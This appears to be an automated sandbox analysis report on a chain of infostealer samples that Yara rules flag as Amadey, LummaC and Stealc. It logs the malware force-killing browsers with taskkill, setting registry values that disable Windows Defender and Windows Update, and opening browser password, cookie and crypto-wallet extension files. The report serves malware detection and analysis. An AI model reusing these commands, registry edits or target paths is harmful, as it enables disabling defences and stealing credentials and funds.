Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 55662d7496.exe, 0000000F.00000000.3022048372.0000000000C82000.00000002.00000001.01000000.00000011.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: 6BWDEAM9H4119O8P9KYSM4M710Q.exe, 6BWDEAM9H4119O8P9KYSM4M710Q.exe, 00000007.00000002.2594272468.0000000000B0C000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: Program Manager
Source: PJGT15Z82T6C2GQS.exe, PJGT15Z82T6C2GQS.exe, 00000004.00000002.2517010047.000000000088E000.00000040.00000001.01000000.00000007.sdmp, 36c3130eac.exe, 0000000D.00000002.2998474440.00000000012FE000.00000040.00000001.01000000.00000010.sdmp Binary or memory string: E1Program Manager
Source: skotes.exe Binary or memory string: zProgram Manager
Source: A94C1J5VAPFWM1J1FS.exe, 00000003.00000002.2439557696.0000000000EBA000.00000040.00000001.01000000.00000006.sdmp, skotes.exe, 00000005.00000002.2498618197.00000000005FA000.00000040.00000001.01000000.0000000A.sdmp, skotes.exe, 00000006.00000002.2499298173.00000000005FA000.00000040.00000001.01000000.0000000A.sdmp Binary or memory string: zProgram Manager
Source: firefox.exe, 0000001C.00000002.3184441481.000000FA031FB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: ee8d47a049.exe, 0000000E.00000002.3049691118.000000000093D000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: >Program Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\PJGT15Z82T6C2GQS.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001140001\55662d7496.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001141001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1001141001\num.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001139001\36c3130eac.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\ZR7XTEYLCJ0IZBOL3C6E.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable Windows Defender notifications (registry)
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1 Jump to behavior
Disable Windows Defender real time protection (registry)
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1 Jump to behavior
Disables Windows Defender Tamper protection
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Registry value created: TamperProtection 0 Jump to behavior
Modifies windows update settings
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6BWDEAM9H4119O8P9KYSM4M710Q.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, 00000000.00000003.2284921931.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2285534089.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2284961748.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2967817966.00000000057F1000.00000004.00000800.00020000.00000000.sdmp, ee8d47a049.exe, 0000000C.00000003.2967613756.00000000010B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 6.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.skotes.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.A94C1J5VAPFWM1J1FS.exe.cc0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 31.2.LIZ1X768O6R3WBN7EPZHLFTDS.exe.8e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2498410813.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2389693706.0000000005460000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2498848977.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2716071552.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.3109974281.0000000004AD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.3156645657.00000000008E1000.00000040.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2458104071.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2456798547.0000000004BF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3438111509.0000000000401000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2436072466.0000000000CC1000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: 0000000F.00000003.3090032690.00000000017EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.3341116550.000000000126F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 55662d7496.exe PID: 6856, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: file.exe PID: 2532, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ee8d47a049.exe PID: 7836, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 32.2.num.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.0.num.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 40.2.num.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.36c3130eac.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.num.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.36c3130eac.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.PJGT15Z82T6C2GQS.exe.4a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.2.ZR7XTEYLCJ0IZBOL3C6E.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.3104993509.0000000000DD1000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2518168701.000000000109E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.2956398464.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.3076762189.0000000000DD1000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.3105966323.0000000004F50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.3280676908.0000000000DD1000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3241643306.00000000009BB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2998225047.0000000000F11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000000.3250481515.0000000000DD1000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3242620243.0000000000F11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2516681456.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.3303275085.00000000001D1000.00000040.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.2428440432.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3109724508.00000000010BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.3148683009.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2997022588.000000000074C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000028.00000002.3284197061.0000000001107000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.3305271933.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: PJGT15Z82T6C2GQS.exe PID: 2988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 36c3130eac.exe PID: 8068, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1001141001\num.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\num[1].exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Found many strings related to Crypto-Wallets (likely being stolen)
Source: ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/Electrum-LTC
Source: ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Wallets/ElectronCash
Source: file.exe String found in binary or memory: Jaxx Liberty
Source: ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: file.exe String found in binary or memory: ExodusWeb3
Source: ee8d47a049.exe, 0000000C.00000003.2945838714.00000000010C1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %appdata%\Ethereum
Source: file.exe String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: file.exe String found in binary or memory: keystore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1001138001\ee8d47a049.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld Jump to behavior
